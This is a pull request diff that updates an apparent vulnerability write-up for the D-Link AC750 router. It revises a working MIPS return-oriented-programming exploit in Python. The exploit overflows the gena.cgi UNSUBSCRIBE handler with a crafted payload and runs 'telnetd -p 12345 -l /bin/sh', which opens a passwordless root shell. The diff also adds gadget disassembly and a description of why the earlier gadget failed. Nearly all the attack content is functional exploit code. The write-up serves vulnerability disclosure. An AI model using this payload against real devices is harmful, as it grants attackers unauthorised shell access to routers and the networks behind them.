### PR TITLE
Update 1.md

### DIFF
--- a/D-Link/AC750/1/1.md
+++ b/D-Link/AC750/1/1.md
@@ -50,26 +50,36 @@ libc_base = 0x77f6c000
 system_addr = 0x52510
 
 # 482
-cmd = b'telnetd -l /bin/sh;'
+cmd = b'telnetd -p 12345 -l /bin/sh;'
 
 payload = 470*b'a'
-payload += p32(0x43F3C + libc_base)         #s0  move $a0,$s2(=>jalr  $s1)
-payload += p32(system_addr + libc_base)          #s1
-payload += b'b'*4                         #s2                 
-payload += p32(0x00017D68 + libc_base)      # ra addiu $s2,$sp,0x150+var_140(=>jalr  $s0)
+payload += p32(system_addr + libc_base)    #s0
+payload += b'b'*4                          #s1                 
+payload += b'b'*4                          #s2                 
+payload += p32(0x00017D68 + libc_base)     #ra
 payload += cmd
+
+#.text:00017D68 02 00 C8 21                   move    $t9, $s0
+#.text:00017D6C 00 46 10 21                   addu    $v0, $a2
+#.text:00017D70 24 42 00 10                   addiu   $v0, 0x10
+#.text:00017D74 00 02 10 C2                   srl     $v0, 3
+#.text:00017D78 00 02 10 C0                   sll     $v0, 3
+#.text:00017D7C 03 A2 E8 23                   subu    $sp, $v0
+#.text:00017D80 27 B2 00 10                   addiu   $s2, $sp, 0x150+var_140
+#.text:00017D84 03 20 F8 09                   jalr    $t9 ; mempcpy
+#.text:00017D88 02 40 20 21                   move    $a0, $s2
 
 msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
 msg += b"Host: localhost:49152\r\n"
 msg += b"SID: 1\r\n\r\n"
 s.send(msg)
 sleep(1)          
-system("telnet 192.168.0.1 23")
+system("telnet 192.168.0.1 12345")
 ```
 
 The telnet service has been started.
 
-Using the username and password from CVE-2024-22853,it successfully logged into the telnet service.
+Password is not required to login into telnet.
 
 ![img6](https://raw.githubusercontent.com/Beckaf/vunl/main/D-Link/AC750/1/img/img6.jpg)
 


### PR DESCRIPTION
The previous gadget actually did not work. `system` function will override the given command on stack (https://wzt.ac.cn/2021/09/17/mipsrop/).
Here is the updated version that does not use the first gadget which raises the stack.